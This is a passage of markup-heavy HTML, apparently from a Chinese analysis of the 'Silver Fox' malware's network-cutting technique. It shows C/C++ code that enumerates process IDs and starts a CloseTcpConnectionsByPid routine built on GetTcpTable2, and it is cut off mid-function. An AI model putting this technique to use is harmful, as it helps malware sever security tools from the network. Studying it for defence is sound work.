Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">Process32NextW</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">pe</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">));</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">CloseHandle</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">snapshot</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> pids</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DataTypeTok&#39;;color: #902000;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">void</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> CloseTcpConnectionsByPid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">DWORD pid</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD size </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;DecValTok&#39;;color: #40A070;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">0</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PMIB_TCPTABLE2 tcpTable </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;KeywordTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">nullptr, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size, TRUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> ERROR_INSUFFICIENT_BUFFER</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">        </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">}</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">tcpTable </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">PMIB_TCPTABLE2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">malloc</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">);</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(!</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">return</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ControlFlowTok&#39;;color: #007020;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">if</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">GetTcpTable2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">(</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">tcpTable, </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">&amp;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">size, TRUE</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">!=</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf=""> NO_ERROR</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">{</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span 